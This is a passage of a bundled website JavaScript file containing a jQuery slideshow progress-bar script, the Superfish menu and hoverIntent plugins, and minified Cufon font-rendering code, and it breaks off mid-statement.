    cycleFx: 'scrollHorz',
    cycleSpeed: 600,  
    
    //progressbar options
    barHeight: 14,
    barDisplacement: 20,
    barImgLeft: "/images/pc_item_left.gif",
    barImgRight: "/images/pc_item_right.gif",
    barImgCenter: "/images/pc_item_center.gif",
    barImgBarEmpty: "/images/pc_bar_empty.gif",
    barImgBarFull: "/images/pc_bar_full.gif",
    
    //variables this script need
    itemCount: 0,
    currentItem: 0,
    itemBarWidth: 0,
    barContainer: "",
    barContainerActive: "",
    barContainerOverflow: "",
    disableAnimation: false,
    
    init: function() {
        
        presentationCycle.itemCount = $('#' + presentationCycle.containerId).children().length;

        presentationCycle.barContainer = $("<div></div>");
        $(presentationCycle.barContainer).addClass("pc_bar_container");
        
        var subtrackSpace = (presentationCycle.itemCount * presentationCycle.barHeight);
        var totalWidth = $('#' + presentationCycle.containerId).innerWidth() - presentationCycle.barDisplacement;
        var fillWidth = Math.floor((totalWidth - subtrackSpace) / (presentationCycle.itemCount - 1));
        presentationCycle.itemBarWidth = fillWidth;
        
        for (var i = 0; i < presentationCycle.itemCount; i++) {
            var item = $("<div>&nbsp;</div>").appendTo(presentationCycle.barContainer);
            var extra_bar = true;
            if (i == 0) {
                $(item).addClass("left");
                $(item).css({
                    backgroundImage: "url(" + presentationCycle.barImgLeft + ")",
                    height: presentationCycle.barHeight + "px",
                    width: presentationCycle.barHeight + "px"
                });
            } else if (i == (presentationCycle.itemCount - 1)) {
                $(item).addClass("right");
                $(item).css({
                    backgroundImage: "url(" + presentationCycle.barImgRight + ")",
                    height: presentationCycle.barHeight + "px",
                    width: presentationCycle.barHeight + "px"
                });
                extra_bar = false;
            } else {
                $(item).addClass("center");
                $(item).css({
                    backgroundImage: "url(" + presentationCycle.barImgCenter + ")",
                    height: presentationCycle.barHeight + "px",
                    width: presentationCycle.barHeight + "px"
                });
            }
            $(item).attr('itemNr', (i + 1));
            $(item).css('cursor', 'pointer');
            $(item).click(function() {
               presentationCycle.gotoSlide($(this).attr('itemNr'));
            });
            
            if (extra_bar == true) {
                var item = $("<div>&nbsp;</div>").appendTo(presentationCycle.barContainer);
                $(item).addClass("bar");
                 $(item).css({
                    backgroundImage: "url(" + presentationCycle.barImgBarEmpty + ")",
                    height: presentationCycle.barHeight + "px",
                    width: fillWidth + "px"
                });
            }
        }
        
        var overflow = $("<div></div>");
        $(overflow).addClass("pc_bar_container_overflow");
        $(overflow).css({
            overflow: "hidden",
            width: totalWidth + "px"
        });
        var underflow = $("<div></div>");
        $(underflow).addClass("pc_bar_container_underflow").appendTo(overflow);
        
        presentationCycle.barContainerActive = $(presentationCycle.barContainer).clone().appendTo(underflow);
        $(presentationCycle.barContainerActive).removeClass("pc_bar_container");
        $(presentationCycle.barContainerActive).children().each(function () {
            $(this).css({
                backgroundPosition: "right"
            });
            if ($(this).css("background-image").match(presentationCycle.barImgBarEmpty)) {
                var newImg = $(this).css("background-image").replace(presentationCycle.barImgBarEmpty, presentationCycle.barImgBarFull);
                $(this).css("background-image", newImg);
            }
        });
        $(overflow).css({
            width: presentationCycle.barHeight + "px",
            height: presentationCycle.barHeight + "px"
        });
        
        presentationCycle.barContainerOverflow = overflow;

        $('#' + presentationCycle.containerId).cycle({
    		fx: presentationCycle.cycleFx,
            speed: presentationCycle.cycleSpeed,
            timeout: presentationCycle.slideTimeout,
            before: function(currSlideElement, nextSlideElement) { presentationCycle.beforeSlide(currSlideElement, nextSlideElement); }
    	});
        
        presentationCycle.barContainer.appendTo($('#' + presentationCycle.containerId));
        overflow.appendTo($('#' + presentationCycle.containerId));
        
        var i = 0;
        $(".pc_bar_container_overflow .left, .pc_bar_container_overflow .center, .pc_bar_container_overflow .right").each(function () {
            $(this).attr('itemNr', (i + 1));
            $(this).css('cursor', 'pointer');
            $(this).click(function() {
                presentationCycle.gotoSlide($(this).attr('itemNr'));
            });
            i++;
        });
    },
    
    beforeSlide: function(currSlideElement, nextSlideElement) {
        if (presentationCycle.currentItem == 0) {
            presentationCycle.currentItem = 1;
        } else {
            presentationCycle.currentItem = (presentationCycle.itemCount - ($(nextSlideElement).nextAll().length)) + 2;
        }
        presentationCycle.animateProcess();
    },
    
    animateProcess: function() {
        var startWidth = (presentationCycle.itemBarWidth * (presentationCycle.currentItem - 1)) + (presentationCycle.barHeight * presentationCycle.currentItem);
        if (presentationCycle.currentItem != presentationCycle.itemCount) {
            var newWidth = (presentationCycle.itemBarWidth * (presentationCycle.currentItem)) + (presentationCycle.barHeight * (presentationCycle.currentItem + 1));   
        } else {
            var newWidth = presentationCycle.barHeight;
        }
        
        $(presentationCycle.barContainerOverflow).css({
            width: startWidth + "px"
        });
        if (presentationCycle.disableAnimation == false) {
            $(presentationCycle.barContainerOverflow).stop().animate({
                width: newWidth + "px"
            }, (presentationCycle.slideTimeout - 100));   
        }
    },
    
    gotoSlide: function(itemNr) {
        $(presentationCycle.barContainerOverflow).stop();
        presentationCycle.disableAnimation = true;
        $('#' + presentationCycle.containerId).cycle((itemNr - 1));
        $('#' + presentationCycle.containerId).cycle('pause');
    }
    
}

/*
 * Superfish v1.4.8 - jQuery menu widget
 * Copyright (c) 2008 Joel Birch
 *
 * Dual licensed under the MIT and GPL licenses:
 * 	http://www.opensource.org/licenses/mit-license.php
 * 	http://www.gnu.org/licenses/gpl.html
 *
 * CHANGELOG: http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt
 */

;(function($){
	$.fn.superfish = function(op){

		var sf = $.fn.superfish,
			c = sf.c,
			$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
			over = function(){
				var $$ = $(this), menu = getMenu($$);
				clearTimeout(menu.sfTimer);
				$$.showSuperfishUl().siblings().hideSuperfishUl();
			},
			out = function(){
				var $$ = $(this), menu = getMenu($$), o = sf.op;
				clearTimeout(menu.sfTimer);
				menu.sfTimer=setTimeout(function(){
					o.retainPath=($.inArray($$[0],o.$path)>-1);
					$$.hideSuperfishUl();
					if (o.$path.length && $$.parents(['li.',o.hoverClass].join('')).length<1){over.call(o.$path);}
				},o.delay);	
			},
			getMenu = function($menu){
				var menu = $menu.parents(['ul.',c.menuClass,':first'].join(''))[0];
				sf.op = sf.o[menu.serial];
				return menu;
			},
			addArrow = function($a){ $a.addClass(c.anchorClass).append($arrow.clone()); };
			
		return this.each(function() {
			var s = this.serial = sf.o.length;
			var o = $.extend({},sf.defaults,op);
			o.$path = $('li.'+o.pathClass,this).slice(0,o.pathLevels).each(function(){
				$(this).addClass([o.hoverClass,c.bcClass].join(' '))
					.filter('li:has(ul)').removeClass(o.pathClass);
			});
			sf.o[s] = sf.op = o;
			
			$('li:has(ul)',this)[($.fn.hoverIntent && !o.disableHI) ? 'hoverIntent' : 'hover'](over,out).each(function() {
				if (o.autoArrows) addArrow( $('>a:first-child',this) );
			})
			.not('.'+c.bcClass)
				.hideSuperfishUl();
			
			var $a = $('a',this);
			$a.each(function(i){
				var $li = $a.eq(i).parents('li');
				$a.eq(i).focus(function(){over.call($li);}).blur(function(){out.call($li);});
			});
			o.onInit.call(this);
			
		}).each(function() {
			var menuClasses = [c.menuClass];
			if (sf.op.dropShadows  && !($.browser.msie && $.browser.version < 7)) menuClasses.push(c.shadowClass);
			$(this).addClass(menuClasses.join(' '));
		});
	};

	var sf = $.fn.superfish;
	sf.o = [];
	sf.op = {};
	sf.IE7fix = function(){
		var o = sf.op;
		if ($.browser.msie && $.browser.version > 6 && o.dropShadows && o.animation.opacity!=undefined)
			this.toggleClass(sf.c.shadowClass+'-off');
		};
	sf.c = {
		bcClass     : 'sf-breadcrumb',
		menuClass   : 'sf-js-enabled',
		anchorClass : 'sf-with-ul',
		arrowClass  : 'sf-sub-indicator',
		shadowClass : 'sf-shadow'
	};
	sf.defaults = {
		hoverClass	: 'sfHover',
		pathClass	: 'overideThisToUse',
		pathLevels	: 1,
		delay		: 800,
		animation	: {opacity:'show'},
		speed		: 'normal',
		autoArrows	: true,
		dropShadows : true,
		disableHI	: false,		// true disables hoverIntent detection
		onInit		: function(){}, // callback functions
		onBeforeShow: function(){},
		onShow		: function(){},
		onHide		: function(){}
	};
	$.fn.extend({
		hideSuperfishUl : function(){
			var o = sf.op,
				not = (o.retainPath===true) ? o.$path : '';
			o.retainPath = false;
			var $ul = $(['li.',o.hoverClass].join(''),this).add(this).not(not).removeClass(o.hoverClass)
					//.find('>ul').hide().css('visibility','hidden');
					.find('>ul:hidden').css('display','none');

					
			o.onHide.call($ul);
			return this;
		},
		showSuperfishUl : function(){
			var o = sf.op,
				sh = sf.c.shadowClass+'-off',
				$ul = this.addClass(o.hoverClass)
					//.find('>ul:hidden').css('visibility','visible');
					.find('>ul:hidden').css('display','block');
					
			sf.IE7fix.call($ul);
			o.onBeforeShow.call($ul);
			$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
			return this;
		}
	});

})(jQuery);
(function($){
	/* hoverIntent by Brian Cherne */
	$.fn.hoverIntent = function(f,g) {
		// default configuration options
		var cfg = {
			sensitivity: 7,
			interval: 100,
			timeout: 0
		};
		// override configuration options with user supplied object
		cfg = $.extend(cfg, g ? { over: f, out: g } : f );

		// instantiate variables
		// cX, cY = current X and Y position of mouse, updated by mousemove event
		// pX, pY = previous X and Y position of mouse, set by mouseover and polling interval
		var cX, cY, pX, pY;

		// A private function for getting mouse position
		var track = function(ev) {
			cX = ev.pageX;
			cY = ev.pageY;
		};

		// A private function for comparing current and previous mouse position
		var compare = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			// compare mouse positions to see if they've crossed the threshold
			if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivity ) {
				$(ob).unbind("mousemove",track);
				// set hoverIntent state to true (so mouseOut can be called)
				ob.hoverIntent_s = 1;
				return cfg.over.apply(ob,[ev]);
			} else {
				// set previous coordinates for next time
				pX = cX; pY = cY;
				// use self-calling timeout, guarantees intervals are spaced out properly (avoids JavaScript timer bugs)
				ob.hoverIntent_t = setTimeout( function(){compare(ev, ob);} , cfg.interval );
			}
		};

		// A private function for delaying the mouseOut function
		var delay = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			ob.hoverIntent_s = 0;
			return cfg.out.apply(ob,[ev]);
		};

		// A private function for handling mouse 'hovering'
		var handleHover = function(e) {
			// next three lines copied from jQuery.hover, ignore children onMouseOver/onMouseOut
			var p = (e.type == "mouseover" ? e.fromElement : e.toElement) || e.relatedTarget;
			while ( p && p != this ) { try { p = p.parentNode; } catch(e) { p = this; } }
			if ( p == this ) { return false; }

			// copy objects to be passed into t (required for event object to be passed in IE)
			var ev = jQuery.extend({},e);
			var ob = this;

			// cancel hoverIntent timer if it exists
			if (ob.hoverIntent_t) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); }

			// else e.type == "onmouseover"
			if (e.type == "mouseover") {
				// set "previous" X and Y position based on initial entry point
				pX = ev.pageX; pY = ev.pageY;
				// update "current" X and Y position based on mousemove
				$(ob).bind("mousemove",track);
				// start polling interval (self-calling timeout) to compare mouse coordinates over time
				if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}

			// else e.type == "onmouseout"
			} else {
				// unbind expensive mousemove event
				$(ob).unbind("mousemove",track);
				// if hoverIntent state is true, then call the mouseOut function after the specified delay
				if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
			}
		};

		// bind the function to the two event listeners
		return this.mouseover(handleHover).mouseout(handleHover);
	};
	
})(jQuery);

/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var 